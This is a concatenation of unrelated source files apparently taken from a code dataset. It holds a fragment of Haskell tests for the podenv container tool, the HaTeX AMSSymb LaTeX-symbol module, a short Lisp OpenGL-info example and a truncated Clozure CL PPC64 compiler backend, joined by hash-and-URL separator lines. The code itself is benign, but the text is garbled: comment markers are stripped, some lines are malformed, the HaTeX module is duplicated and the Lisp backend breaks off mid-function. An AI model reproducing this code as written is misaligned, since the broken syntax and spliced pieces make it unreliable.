"env // { volumes = [\"/home/data:/tmp/data\", \"/tmp\", \"/home/old-data:/tmp/data\"]}"
(defRun ["--security-opt", "label=disable", "--volume", "/tmp:/tmp", "--volume", "/home/data:/tmp/data"])
where
defImg = "ubi8"
defRe = Podenv.Runtime.defaultGlobalEnv "/data"
runPrepare mode env app = runAppEnv env app $ Podenv.Capability.prepare mode
testEnv =
AppEnv
{ _envHostXdgRunDir = Just "/run/user/1000",
_envHostWaylandSocket = Just (SocketName "wayland-0"),
_envHostHomeDir = Just "/home/user",
_envHostCwd = "/usr/src/podenv",
_envHostUid = 1000,
_envAppHomeDir = Nothing,
_envHostDisplay = ":0",
_envHostSSHAgent = Nothing,
_envIsNVIDIAEnabled = pure False,
_envGetAppHomeDir = \app -> pure $ case app ^. Podenv.Dhall.appRuntime of
Podenv.Dhall.Nix _ -> Just "/home/user"
Podenv.Dhall.Container cb -> toString <$> cb ^. cbImage_home
_ -> Nothing,
_envGetVideoDevices = pure [],
_envGetCertLocation = pure $ Just "/etc/ca"
}
getImg app = case app ^. Podenv.Dhall.arApplication . Podenv.Dhall.appRuntime of
Podenv.Dhall.Image image -> ImageName image
_ -> error "Not podman"
fg = Foreground
getApp code args = do
cli <- Podenv.Main.usage args
cfg <- loadConfig' code
(app, mode, _, _) <- Podenv.Main.cliConfigLoad "/volumes" testEnv cfg cli
runPrepare mode (testEnv & envAppHomeDir ?~ "/home") app
cliTest :: Text -> [String] -> Text -> IO ()
cliTest gotCode args expectedCode = do
got <- getApp gotCode args
expected <- getApp expectedCode []
let removeSelector = ctxLabels .~ mempty
(got & removeSelector) `shouldBe` (expected & removeSelector)
nixTest code args expectedCommand = do
ctx <- getApp code args
drop 3 (ctx ^. ctxCommand) `shouldBe` expectedCommand
addCap code capCode =
"( " <> code <> " // { capabilities = (" <> code <> ").capabilities // {" <> capCode <> "}})"
mkConfig code =
unlines
[ "let Podenv = env:PODENV",
"let Nix = Podenv.Nix",
"let def = { capabilities = {=}, runtime = Podenv.Image \"ubi8\" }",
"let env = def in ",
code
]
loadConfig' code = Podenv.Config.loadConfig (Just . mkConfig $ code)
loadOne code = do
config' <- loadConfig' code
pure $ case Podenv.Config.unConfig config' of
[(_, Podenv.Config.LitApp x)] -> defaultAppRes (Podenv.Config.unRecord x)
_ -> error "Expected a single app"
|
84442848590c4f5f7c7b6133768f3257ba21080500da9a3cd8cd3e0ffc1ba784 | Daniel-Diaz/HaTeX | AMSSymb.hs |
-- | Module for the package @amssymb@.
module Text.LaTeX.Packages.AMSSymb
( -- * AMSSymb package
amssymb
-- * Arrows
, vartriangleleft, vartriangleright
, leftleftarrows, rightrightarrows
, rightleftarrows, leftrightarrows
, upuparrows, downdownarrows
, leftarrowtail, rightarrowtail
, curvearrowleft, curvearrowright
, twoheadleftarrow, twoheadrightarrow
, rightleftharpoons
, lsh2, rsh2
, leftarrow3, rightarrow3
, rightsquigarrow, leftrightsquigarrow
, looparrowleft, looparrowright
, circlearrowleft, circlearrowright
, upharpoonleft, upharpoonright
, downharpoonleft, downharpoonright
, nleftarrow, nrightarrow
, nleftarrow2, nrightarrow2
, nleftrightarrow, nleftrightarrow2
-- * Other
, lll, ggg
, gtrdot, lessdot
, square, blacksquare
, lozenge, blacklozenge
, checkmark, nexists
) where
import Text.LaTeX.Base.Class
import Text.LaTeX.Base.Types
-- | AMSSymb package.
-- Example:
--
> usepackage [ ]
amssymb :: ClassName
amssymb = "amssymb"
--
-- | \(\vartriangleleft\) symbol.
vartriangleleft :: LaTeXC l => l
vartriangleleft = comm0 "vartriangleleft"
-- | \(\vartriangleleft\) symbol.
vartriangleright :: LaTeXC l => l
vartriangleright = comm0 "vartriangleright"
-- | \(\leftleftarrows\) symbol - double left arrows.
leftleftarrows :: LaTeXC l => l
leftleftarrows = comm0 "leftleftarrows"
-- | \(\rightrightarrows\) symbol - double right arrows
rightrightarrows :: LaTeXC l => l
rightrightarrows = comm0 "rightrightarrows"
-- | \(\rightleftarrows\) symbol - right arrow atop a left arrow
rightleftarrows :: LaTeXC l => l
rightleftarrows = comm0 "rightleftarrows"
-- | \(\leftrightarrows\) symbol - left arrow atop a right arrow.
leftrightarrows :: LaTeXC l => l
leftrightarrows = comm0 "leftrightarrows"
-- | \(\upuparrows\) symbol - double upward arrows.
upuparrows :: LaTeXC l => l
upuparrows = comm0 "upuparrows"
-- | \(\downdownarrows\) symbol - double downward arrows.
downdownarrows :: LaTeXC l => l
downdownarrows = comm0 "downdownarrows"
-- | \(\lll\) symbol - triple less than.
lll :: LaTeXC l => l
lll = comm0 "lll"
-- | \(\ggg\) symbol - triple greater than.
ggg :: LaTeXC l => l
ggg = comm0 "ggg"
-- | \(\leftarrowtail\) symbol - leftwards "mapsto"
leftarrowtail :: LaTeXC l => l
leftarrowtail = comm0 "leftarrowtail"
-- | \(\rightarrowtail\) symbol - rightwards "mapsto"
rightarrowtail :: LaTeXC l => l
rightarrowtail = comm0 "rightarrowtail"
-- | \(\curvearrowleft\) symbol - leftwards curved arrow
curvearrowleft :: LaTeXC l => l
curvearrowleft = comm0 "curvearrowleft"
-- | \(\curvearrowright\) symbol - rightwards curved arrow
curvearrowright :: LaTeXC l => l
curvearrowright = comm0 "curvearrowright"
-- | \(\twoheadleftarrow\) symbol - double head left arrow
twoheadleftarrow :: LaTeXC l => l
twoheadleftarrow = comm0 "twoheadleftarrow"
-- | \(\twoheadrightarrow\) symbol - double head right arrow
twoheadrightarrow :: LaTeXC l => l
twoheadrightarrow = comm0 "twoheadleftarrow"
-- | \(\checkmark\) symbol.
checkmark :: LaTeXC l => l
checkmark = comm0 "checkmark"
-- | \(\lozenge\) symbol - narrow diamond
lozenge :: LaTeXC l => l
lozenge = comm0 "lozenge"
-- | \(\blacklozenge\) symbol - filled narrow diamond
blacklozenge :: LaTeXC l => l
blacklozenge = comm0 "blacklozenge"
-- | \(\nexists\) symbol - does not exist
nexists :: LaTeXC l => l
nexists = comm0 "nexists"
-- | \(\lessdot\) symbol - less than with inner dot
lessdot :: LaTeXC l => l
lessdot = comm0 "lessdot"
-- | \(\gtrdot\) symbol - greater than with inner dot
gtrdot :: LaTeXC l => l
gtrdot = comm0 "gtrdot"
-- | \(\square\) symbol - square.
For the QED “ tombstone ” , see ' Text.LaTeX.Packages.AMSThm.qed ' instead ; it is normally the
-- same symbol but gives the suitable text alignment.
square :: LaTeXC l => l
square = comm0 "square"
-- | \(\blacksquare\) symbol - a filled square
blacksquare :: LaTeXC l => l
blacksquare = comm0 "blacksquare"
-- | \(\rightleftharpoons\) symbol
rightleftharpoons :: LaTeXC l => l
rightleftharpoons = comm0 "rightleftharpoons"
-- | \(\Lsh\) symbol
lsh2 :: LaTeXC l => l
lsh2 = comm0 "Lsh"
-- | \(\Rsh\) symbol
rsh2 :: LaTeXC l => l
rsh2 = comm0 "Rsh"
-- | \(\Lleftarrow\) symbol
leftarrow3 :: LaTeXC l => l
leftarrow3 = comm0 "Lleftarrow"
-- | \(\Rrightarrow\) symbol
rightarrow3 :: LaTeXC l => l
rightarrow3 = comm0 "Rrightarrow"
-- | \(\rightsquigarrow\) symbol
rightsquigarrow :: LaTeXC l => l
rightsquigarrow = comm0 "rightsquigarrow"
-- | \(\leftrightsquigarrow\) symbol
leftrightsquigarrow :: LaTeXC l => l
leftrightsquigarrow = comm0 "leftrightsquigarrow"
-- | \(\looparrowleft\) symbol
looparrowleft :: LaTeXC l => l
looparrowleft = comm0 "looparrowleft"
| ) symbol
looparrowright :: LaTeXC l => l
looparrowright = comm0 "looparrowright"
-- | \(\circlearrowleft\) symbol
circlearrowleft :: LaTeXC l => l
circlearrowleft = comm0 "circlearrowleft"
-- | \(\circlearrowright\) symbol
circlearrowright :: LaTeXC l => l
circlearrowright = comm0 "circlearrowright"
-- | \(\upharpoonleft\) symbol
upharpoonleft :: LaTeXC l => l
upharpoonleft = comm0 "upharpoonleft"
-- | \(\upharpoonright\) symbol
upharpoonright :: LaTeXC l => l
upharpoonright = comm0 "upharpoonright"
-- | \(\downharpoonleft\) symbol
downharpoonleft :: LaTeXC l => l
downharpoonleft = comm0 "downharpoonleft"
| \(\downharpoonright\ ) symbol
downharpoonright :: LaTeXC l => l
downharpoonright = comm0 "downharpoonright"
-- | \(\nleftarrow\) symbol
nleftarrow :: LaTeXC l => l
nleftarrow = comm0 "nleftarrow"
-- | \(\nrightarrow\) symbol
nrightarrow :: LaTeXC l => l
nrightarrow = comm0 "nrightarrow"
-- | \(\nLeftarrow\) symbol
nleftarrow2 :: LaTeXC l => l
nleftarrow2 = comm0 "nLeftarrow"
-- | \(\nRightarrow\) symbol
nrightarrow2 :: LaTeXC l => l
nrightarrow2 = comm0 "nRightarrow"
-- | \(\nleftrightarrow\) symbol
nleftrightarrow :: LaTeXC l => l
nleftrightarrow = comm0 "nleftrightarrow"
-- | \(\nLeftrightarrow\) symbol
nleftrightarrow2 :: LaTeXC l => l
nleftrightarrow2 = comm0 "nLeftrightarrow"
| null | https://raw.githubusercontent.com/Daniel-Diaz/HaTeX/aae193763157378500ebedc733c913e74f53b060/Text/LaTeX/Packages/AMSSymb.hs | haskell | | Module for the package @amssymb@.
* AMSSymb package
* Arrows
* Other
| AMSSymb package.
Example:
| \(\vartriangleleft\) symbol.
| \(\vartriangleleft\) symbol.
| \(\leftleftarrows\) symbol - double left arrows.
| \(\rightrightarrows\) symbol - double right arrows
| \(\rightleftarrows\) symbol - right arrow atop a left arrow
| \(\leftrightarrows\) symbol - left arrow atop a right arrow.
| \(\upuparrows\) symbol - double upward arrows.
| \(\downdownarrows\) symbol - double downward arrows.
| \(\lll\) symbol - triple less than.
| \(\ggg\) symbol - triple greater than.
| \(\leftarrowtail\) symbol - leftwards "mapsto"
| \(\rightarrowtail\) symbol - rightwards "mapsto"
| \(\curvearrowleft\) symbol - leftwards curved arrow
| \(\curvearrowright\) symbol - rightwards curved arrow
| \(\twoheadleftarrow\) symbol - double head left arrow
| \(\twoheadrightarrow\) symbol - double head right arrow
| \(\checkmark\) symbol.
| \(\lozenge\) symbol - narrow diamond
| \(\blacklozenge\) symbol - filled narrow diamond
| \(\nexists\) symbol - does not exist
| \(\lessdot\) symbol - less than with inner dot
| \(\gtrdot\) symbol - greater than with inner dot
| \(\square\) symbol - square.
same symbol but gives the suitable text alignment.
| \(\blacksquare\) symbol - a filled square
| \(\rightleftharpoons\) symbol
| \(\Lsh\) symbol
| \(\Rsh\) symbol
| \(\Lleftarrow\) symbol
| \(\Rrightarrow\) symbol
| \(\rightsquigarrow\) symbol
| \(\leftrightsquigarrow\) symbol
| \(\looparrowleft\) symbol
| \(\circlearrowleft\) symbol
| \(\circlearrowright\) symbol
| \(\upharpoonleft\) symbol
| \(\upharpoonright\) symbol
| \(\downharpoonleft\) symbol
| \(\nleftarrow\) symbol
| \(\nrightarrow\) symbol
| \(\nLeftarrow\) symbol
| \(\nRightarrow\) symbol
| \(\nleftrightarrow\) symbol
| \(\nLeftrightarrow\) symbol |
module Text.LaTeX.Packages.AMSSymb
amssymb
, vartriangleleft, vartriangleright
, leftleftarrows, rightrightarrows
, rightleftarrows, leftrightarrows
, upuparrows, downdownarrows
, leftarrowtail, rightarrowtail
, curvearrowleft, curvearrowright
, twoheadleftarrow, twoheadrightarrow
, rightleftharpoons
, lsh2, rsh2
, leftarrow3, rightarrow3
, rightsquigarrow, leftrightsquigarrow
, looparrowleft, looparrowright
, circlearrowleft, circlearrowright
, upharpoonleft, upharpoonright
, downharpoonleft, downharpoonright
, nleftarrow, nrightarrow
, nleftarrow2, nrightarrow2
, nleftrightarrow, nleftrightarrow2
, lll, ggg
, gtrdot, lessdot
, square, blacksquare
, lozenge, blacklozenge
, checkmark, nexists
) where
import Text.LaTeX.Base.Class
import Text.LaTeX.Base.Types
> usepackage [ ]
amssymb :: ClassName
amssymb = "amssymb"
vartriangleleft :: LaTeXC l => l
vartriangleleft = comm0 "vartriangleleft"
vartriangleright :: LaTeXC l => l
vartriangleright = comm0 "vartriangleright"
leftleftarrows :: LaTeXC l => l
leftleftarrows = comm0 "leftleftarrows"
rightrightarrows :: LaTeXC l => l
rightrightarrows = comm0 "rightrightarrows"
rightleftarrows :: LaTeXC l => l
rightleftarrows = comm0 "rightleftarrows"
leftrightarrows :: LaTeXC l => l
leftrightarrows = comm0 "leftrightarrows"
upuparrows :: LaTeXC l => l
upuparrows = comm0 "upuparrows"
downdownarrows :: LaTeXC l => l
downdownarrows = comm0 "downdownarrows"
lll :: LaTeXC l => l
lll = comm0 "lll"
ggg :: LaTeXC l => l
ggg = comm0 "ggg"
leftarrowtail :: LaTeXC l => l
leftarrowtail = comm0 "leftarrowtail"
rightarrowtail :: LaTeXC l => l
rightarrowtail = comm0 "rightarrowtail"
curvearrowleft :: LaTeXC l => l
curvearrowleft = comm0 "curvearrowleft"
curvearrowright :: LaTeXC l => l
curvearrowright = comm0 "curvearrowright"
twoheadleftarrow :: LaTeXC l => l
twoheadleftarrow = comm0 "twoheadleftarrow"
twoheadrightarrow :: LaTeXC l => l
twoheadrightarrow = comm0 "twoheadleftarrow"
checkmark :: LaTeXC l => l
checkmark = comm0 "checkmark"
lozenge :: LaTeXC l => l
lozenge = comm0 "lozenge"
blacklozenge :: LaTeXC l => l
blacklozenge = comm0 "blacklozenge"
nexists :: LaTeXC l => l
nexists = comm0 "nexists"
lessdot :: LaTeXC l => l
lessdot = comm0 "lessdot"
gtrdot :: LaTeXC l => l
gtrdot = comm0 "gtrdot"
For the QED “ tombstone ” , see ' Text.LaTeX.Packages.AMSThm.qed ' instead ; it is normally the
square :: LaTeXC l => l
square = comm0 "square"
blacksquare :: LaTeXC l => l
blacksquare = comm0 "blacksquare"
rightleftharpoons :: LaTeXC l => l
rightleftharpoons = comm0 "rightleftharpoons"
lsh2 :: LaTeXC l => l
lsh2 = comm0 "Lsh"
rsh2 :: LaTeXC l => l
rsh2 = comm0 "Rsh"
leftarrow3 :: LaTeXC l => l
leftarrow3 = comm0 "Lleftarrow"
rightarrow3 :: LaTeXC l => l
rightarrow3 = comm0 "Rrightarrow"
rightsquigarrow :: LaTeXC l => l
rightsquigarrow = comm0 "rightsquigarrow"
leftrightsquigarrow :: LaTeXC l => l
leftrightsquigarrow = comm0 "leftrightsquigarrow"
looparrowleft :: LaTeXC l => l
looparrowleft = comm0 "looparrowleft"
| ) symbol
looparrowright :: LaTeXC l => l
looparrowright = comm0 "looparrowright"
circlearrowleft :: LaTeXC l => l
circlearrowleft = comm0 "circlearrowleft"
circlearrowright :: LaTeXC l => l
circlearrowright = comm0 "circlearrowright"
upharpoonleft :: LaTeXC l => l
upharpoonleft = comm0 "upharpoonleft"
upharpoonright :: LaTeXC l => l
upharpoonright = comm0 "upharpoonright"
downharpoonleft :: LaTeXC l => l
downharpoonleft = comm0 "downharpoonleft"
| \(\downharpoonright\ ) symbol
downharpoonright :: LaTeXC l => l
downharpoonright = comm0 "downharpoonright"
nleftarrow :: LaTeXC l => l
nleftarrow = comm0 "nleftarrow"
nrightarrow :: LaTeXC l => l
nrightarrow = comm0 "nrightarrow"
nleftarrow2 :: LaTeXC l => l
nleftarrow2 = comm0 "nLeftarrow"
nrightarrow2 :: LaTeXC l => l
nrightarrow2 = comm0 "nRightarrow"
nleftrightarrow :: LaTeXC l => l
nleftrightarrow = comm0 "nleftrightarrow"
nleftrightarrow2 :: LaTeXC l => l
nleftrightarrow2 = comm0 "nLeftrightarrow"
|
2a0ee28d2856d4d5a7a876e9062466a25fe2a18ab63107a7c368eb2fcc2f5c45 | lispbuilder/lispbuilder | gl-info-sdl.lisp |
(in-package #:rm-examples)
(defun gl-info-sdl ()
(make-instance 'rm::sdl-window :width 320 :height 240)
(format t "GL-VERSION: ~A~%" (rm::gl-version))
(format t "GL-VENDOR: ~A~%" (rm::gl-vendor))
(format t "GL-RENDERER: ~A~%" (rm::gl-renderer))
(format t "GL-EXTENSIONS: ~%")
(format t "==============~%")
(format t "~{~a~%~}" (rm::gl-extensions))
(format t "~%")
(format t "GLU-VERSION: ~A~%" (rm::glu-version))
(format t "GLU-EXTENSIONS: ~%")
(format t "===============~%")
(format t "~{~a~%~}" (rm::glu-extensions))
(rm::clean-up))
| null | https://raw.githubusercontent.com/lispbuilder/lispbuilder/589b3c6d552bbec4b520f61388117d6c7b3de5ab/lispbuilder-openrm/examples/gl-info-sdl.lisp | lisp |
(in-package #:rm-examples)
(defun gl-info-sdl ()
(make-instance 'rm::sdl-window :width 320 :height 240)
(format t "GL-VERSION: ~A~%" (rm::gl-version))
(format t "GL-VENDOR: ~A~%" (rm::gl-vendor))
(format t "GL-RENDERER: ~A~%" (rm::gl-renderer))
(format t "GL-EXTENSIONS: ~%")
(format t "==============~%")
(format t "~{~a~%~}" (rm::gl-extensions))
(format t "~%")
(format t "GLU-VERSION: ~A~%" (rm::glu-version))
(format t "GLU-EXTENSIONS: ~%")
(format t "===============~%")
(format t "~{~a~%~}" (rm::glu-extensions))
(rm::clean-up))
| |
528a0e2b5c799c144c24514f6e6904670753b7a0f2a378446793c68d0894bbca | fukamachi/clozure-cl | ppc64-backend.lisp | -*- Mode : Lisp ; Package : CCL -*-
;;;
Copyright ( C ) 2009 Clozure Associates
Copyright ( C ) 2004 , 2005 Clozure Associates
This file is part of Clozure CL .
;;;
Clozure CL is licensed under the terms of the Lisp Lesser GNU Public
License , known as the LLGPL and distributed with Clozure CL as the
;;; file "LICENSE". The LLGPL consists of a preamble and the LGPL,
which is distributed with Clozure CL as the file " LGPL " . Where these
;;; conflict, the preamble takes precedence.
;;;
;;; Clozure CL is referenced in the preamble as the "LIBRARY."
;;;
;;; The LLGPL is also available online at
;;;
(in-package "CCL")
(eval-when (:compile-toplevel :load-toplevel :execute)
(require "BACKEND"))
(eval-when (:compile-toplevel :execute)
(require "NXENV")
(require "PPCENV"))
Callbacks . Both LinuxPPC64 and follow something
close to the PowerOpen ABI . LinuxPPC uses transition vectors
;;; and a TOC, but it's not clear that we need to care about that
;;; here.
(defun define-ppc64-poweropen-callback (name args body env)
(let* ((stack-word (gensym))
(stack-ptr (gensym))
(fp-arg-regs (gensym))
(fp-arg-num 0)
(arg-names ())
(arg-types ())
(return-type :void)
(args args)
(woi nil)
(monitor nil)
(dynamic-extent-names ())
(error-return nil))
(loop
(when (null args) (return))
(when (null (cdr args))
(setq return-type (car args))
(return))
(if (eq (car args) :without-interrupts)
(setq woi (cadr args) args (cddr args))
(if (eq (car args) :monitor-exception-ports)
(setq monitor (cadr args) args (cddr args))
(if (eq (car args) :error-return)
(setq error-return
(cadr args)
args (cddr args))
(progn
(push (foreign-type-to-representation-type (pop args)) arg-types)
(push (pop args) arg-names))))))
(setq arg-names (nreverse arg-names)
arg-types (nreverse arg-types))
(setq return-type (foreign-type-to-representation-type return-type))
(when (eq return-type :void)
(setq return-type nil))
(let* ((offset 0)
(need-stack-pointer (or arg-names return-type error-return))
(lets
(mapcar
#'(lambda (name type)
(let* ((delta 8)
(bias 0)
(use-fp-args nil))
(prog1
(list name
`(,
(if (typep type 'unsigned-byte)
(progn (setq delta (* 8 type)) '%inc-ptr)
(ecase type
(:single-float
(if (< (incf fp-arg-num) 14)
(progn
(setq use-fp-args t)
'%get-single-float-from-double-ptr)
(progn
(setq bias 4)
'%get-single-float)))
(:double-float
(setq delta 8)
(if (< (incf fp-arg-num) 14)
(setq use-fp-args t))
'%get-double-float)
(:signed-doubleword (setq delta 8) '%%get-signed-longlong)
(:signed-fullword
(setq bias 4)
'%get-signed-long)
(:signed-halfword (setq bias 6)
'%get-signed-word)
(:signed-byte (setq bias 7)
'%get-signed-byte)
(:unsigned-doubleword (setq delta 8) '%%get-unsigned-longlong)
(:unsigned-fullword
(setq bias 4)
'%get-unsigned-long)
(:unsigned-halfword
(setq bias 6)
'%get-unsigned-word)
(:unsigned-byte
(setq bias 7)
'%get-unsigned-byte)
(:address '%get-ptr)))
,(if use-fp-args fp-arg-regs stack-ptr)
,(if use-fp-args (* 8 (1- fp-arg-num))
`(+ ,offset ,bias))))
(when (or (eq type :address)
(typep type 'unsigned-byte))
(push name dynamic-extent-names))
(incf offset delta))))
arg-names arg-types)))
(multiple-value-bind (body decls doc) (parse-body body env t)
`(progn
(declaim (special ,name))
(define-callback-function
(nfunction ,name
(lambda (,stack-word)
(declare (ignorable ,stack-word))
(block ,name
(with-macptrs (,@(and need-stack-pointer (list `(,stack-ptr))))
,(when need-stack-pointer
`(%setf-macptr-to-object ,stack-ptr ,stack-word))
,(defcallback-body stack-ptr lets dynamic-extent-names
decls body return-type error-return
(- ppc64::c-frame.savelr ppc64::c-frame.param0)
fp-arg-regs
)))))
,doc
,woi
,monitor))))))
(defun defcallback-body-ppc64-poweropen (stack-ptr lets dynamic-extent-names decls body return-type error-return error-delta fp-arg-ptr)
(let* ((result (gensym))
(result-ptr (case return-type
((:single-float :double-float) fp-arg-ptr)
(t stack-ptr)))
(condition-name (if (atom error-return) 'error (car error-return)))
(error-return-function (if (atom error-return) error-return (cadr error-return)))
(body
`(with-macptrs ((,fp-arg-ptr (%get-ptr ,stack-ptr (- ppc64::c-frame.unused-1 ppc64::c-frame.param0))))
(declare (ignorable ,fp-arg-ptr))
(let ,lets
(declare (dynamic-extent ,@dynamic-extent-names))
,@decls
(let ((,result (progn ,@body)))
(declare (ignorable ,result))
,@(progn
;; Coerce SINGLE-FLOAT result to DOUBLE-FLOAT
(when (eq return-type :single-float)
(setq result `(float ,result 0.0d0)))
nil)
,(when return-type
`(setf (,
(case return-type
(:address '%get-ptr)
(:signed-doubleword '%%get-signed-longlong)
(:unsigned-doubleword '%%get-unsigned-longlong)
((:double-float :single-float) '%get-double-float)
(t '%%get-signed-longlong )) ,result-ptr 0) ,result)))))))
(if error-return
(let* ((cond (gensym)))
`(handler-case ,body
(,condition-name (,cond) (,error-return-function ,cond ,stack-ptr (%inc-ptr ,stack-ptr ,error-delta)))))
body)))
(defvar *ppc64-vinsn-templates* (make-hash-table :test #'eq))
(defvar *known-ppc64-backends* ())
#+linuxppc-target
(defvar *linuxppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-linux platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :poweropen-target :linux-target :linuxppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "p64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-linux
platform-word-size-64)
:target-os :linuxppc
:name :linuxppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen
))
#+darwinppc-target
(defvar *darwinppc64-backend*
(make-backend :lookup-opcode #'lookup-ppc-opcode
:lookup-macro #'ppc::ppc-macro-function
:lap-opcodes ppc::*ppc-opcodes*
:define-vinsn 'define-ppc-vinsn
:platform-syscall-mask (logior platform-os-darwin platform-cpu-ppc)
:p2-dispatch *ppc2-specials*
:p2-vinsn-templates *ppc64-vinsn-templates*
:p2-template-hash-name '*ppc64-vinsn-templates*
:p2-compile 'ppc2-compile
:target-specific-features
'(:powerpc :ppc-target :darwin-target :darwinppc-target :ppc64-target :64-bit-target :big-endian-target)
:target-fasl-pathname (make-pathname :type "d64fsl")
:target-platform (logior platform-cpu-ppc
platform-os-darwin
platform-word-size-64)
:target-os :darwinppc
:name :darwinppc64
:target-arch-name :ppc64
:target-foreign-type-data nil
:target-arch ppc64::*ppc64-target-arch*
:define-callback 'define-ppc64-poweropen-callback
:defcallback-body 'defcallback-body-ppc64-poweropen))
#+linuxppc-target
(pushnew *linuxppc64-backend* *known-ppc64-backends* :key #'backend-name)
#+darwinppc-target
(pushnew *darwinppc64-backend* *known-ppc64-backends* :key #'backend-name)
(defvar *ppc64-backend* (car *known-ppc64-backends*))
(defun fixup-ppc64-backend ()
(dolist (b *known-ppc64-backends*)
(setf (backend-lap-opcodes b) ppc::*ppc-opcodes*
(backend-p2-dispatch b) *ppc2-specials*
(backend-p2-vinsn-templates b) *ppc64-vinsn-templates*)
(or (backend-lap-macros b) (setf (backend-lap-macros b)
(make-hash-table :test #'equalp)))))
(fixup-ppc64-backend)
#+ppc64-target
(setq *host-backend* *ppc64-backend* *target-backend* *ppc64-backend*)
#-ppc64-target
(unless (backend-target-foreign-type-data *ppc64-backend*)
(let* ((ftd (make-ftd
:interface-db-directory
#+darwinppc-target "ccl:darwin-headers64;"
#+linuxppc-target "ccl:headers64;"
:interface-package-name
#+darwinppc-target "DARWIN64"
#+linuxppc-target "LINUX64"
:attributes
#+darwinppc-target
'(:signed-char t
:struct-by-value t
:struct-return-in-registers t
:struct-return-explicit t
:struct-by-value-by-field t
:prepend-underscores t
:bits-per-word 64)
#+linuxppc-target
'(:bits-per-word 64)
:ff-call-expand-function
#+linuxppc-target
'linux64::expand-ff-call
#+darwinppc-target
'darwin64::expand-ff-call
:ff-call-struct-return-by-implicit-arg-function
#+linuxppc-target
linux64::record-type-returns-structure-as-first-arg
#+darwinppc-target
darwin64::record-type-returns-structure-as-first-arg
:callback-bindings-function
#+linuxppc-target
linux64::generate-callback-bindings
#+darwinppc-target
darwin64::generate-callback-bindings
:callback-return-value-function
#+linuxppc-target
linux64::generate-callback-return-value
#+darwinppc-target
darwin64::generate-callback-return-value
)))
(install-standard-foreign-types ftd)
(use-interface-dir :libc ftd)
(setf (backend-target-foreign-type-data *ppc64-backend*) ftd)))
(pushnew *ppc64-backend* *known-backends* :key #'backend-name)
#+ppc64-target
(require "PPC64-VINSNS")
(provide "PPC64-BACKEND")
| null | https://raw.githubusercontent.com/fukamachi/clozure-cl/4b0c69452386ae57b08984ed815d9b50b4bcc8a2/compiler/PPC/PPC64/ppc64-backend.lisp | lisp | Package : CCL -*-
file "LICENSE". The LLGPL consists of a preamble and the LGPL,
conflict, the preamble takes precedence.
Clozure CL is referenced in the preamble as the "LIBRARY."
The LLGPL is also available online at
and a TOC, but it's not clear that we need to care about that
here.
Coerce SINGLE-FLOAT result to DOUBLE-FLOAT | Copyright ( C ) 2009 Clozure Associates
Copyright ( C ) 2004 , 2005 Clozure Associates
This file is part of Clozure CL .
Clozure CL is licensed under the terms of the Lisp Lesser GNU Public
License , known as the LLGPL and distributed with Clozure CL as the
which is distributed with Clozure CL as the file " LGPL " . Where these
(in-package "CCL")
(eval-when (:compile-toplevel :load-toplevel :execute)
(require "BACKEND"))
(eval-when (:compile-toplevel :execute)
(require "NXENV")
(require "PPCENV"))
Callbacks . Both LinuxPPC64 and follow something
close to the PowerOpen ABI . LinuxPPC uses transition vectors
(defun define-ppc64-poweropen-callback (name args body env)
(let* ((stack-word (gensym))
(stack-ptr (gensym))
(fp-arg-regs (gensym))
(fp-arg-num 0)
(arg-names ())
(arg-types ())
(return-type :void)
(args args)
(woi nil)
(monitor nil)
(dynamic-extent-names ())
(error-return nil))
(loop
(when (null args) (return))
(when (null (cdr args))
(setq return-type (car args))
(return))
(if (eq (car args) :without-interrupts)
(setq woi (cadr args) args (cddr args))
(if (eq (car args) :monitor-exception-ports)
(setq monitor (cadr args) args (cddr args))
(if (eq (car args) :error-return)
(setq error-return
(cadr args)
args (cddr args))
(progn
(push (foreign-type-to-representation-type (pop args)) arg-types)
(push (pop args) arg-names))))))
(setq arg-names (nreverse arg-names)
arg-types (nreverse arg-types))
(setq return-type (foreign-type-to-representation-type return-type))
(when (eq return-type :void)
(setq return-type nil))
(let* ((offset 0)
(need-stack-pointer (or arg-names return-type error-return))
(lets
(mapcar
#'(lambda (name type)
(let* ((delta 8)
(bias 0)
(use-fp-args nil))
(prog1
(list name
`(,
(if (typep type 'unsigned-byte)
(progn (setq delta (* 8 type)) '%inc-ptr)
(ecase type
(:single-float
(if (< (incf fp-arg-num) 14)
(progn
(setq use-fp-args t)
'%get-single-float-from-double-ptr)
(progn
(setq bias 4)
'%get-single-float)))
(:double-float
(setq delta 8)
(if (< (incf fp-arg-num) 14)
(setq use-fp-args t))
'%get-double-float)
(:signed-doubleword (setq delta 8) '%%get-signed-longlong)
(:signed-fullword
(setq bias 4)
'%get-signed-long)
(:signed-halfword (setq bias 6)
'%get-signed-word)
(:signed-byte (setq bias 7)
'%get-signed-byte)
(:unsigned-doubleword (setq delta 8) '%%get-unsigned-longlong)
(:unsigned-fullword
(setq bias 4)
'%get-unsigned-long)
(:unsigned-halfword
(setq bias 6)
'%get-unsigned-word)
(:unsigned-byte
(setq bias 7)
'%get-unsigned-byte)
(:address '%get-ptr)))
,(if use-fp-args fp-arg-regs stack-ptr)
,(if use-fp-args (* 8 (1- fp-arg-num))
`(+ ,offset ,bias))))
(when (or (eq type :address)
(typep type 'unsigned-byte))
(push name dynamic-extent-names))
(incf offset delta))))
arg-names arg-types)))
(multiple-value-bind (body decls doc) (parse-body body env t)
`(progn
(declaim (special ,name))
(define-callback-function
(nfunction ,name
(lambda (,stack-word)
(declare (ignorable ,stack-word))
(block ,name
(with-macptrs (,@(and need-stack-pointer (list `(,stack-ptr))))
,(when need-stack-pointer
`(%setf-macptr-to-object ,stack-ptr ,stack-word))
,(defcallback-body stack-ptr lets dynamic-extent-names
decls body return-type error-return
(- ppc64::c-frame.savelr ppc64::c-frame.param0)
fp-arg-regs
)))))
,doc
,woi
,monitor))))))
(defun defcallback-body-ppc64-poweropen (stack-ptr lets dynamic-extent-names decls body return-type error-return error-delta fp-arg-ptr)
(let* ((result (gensym))
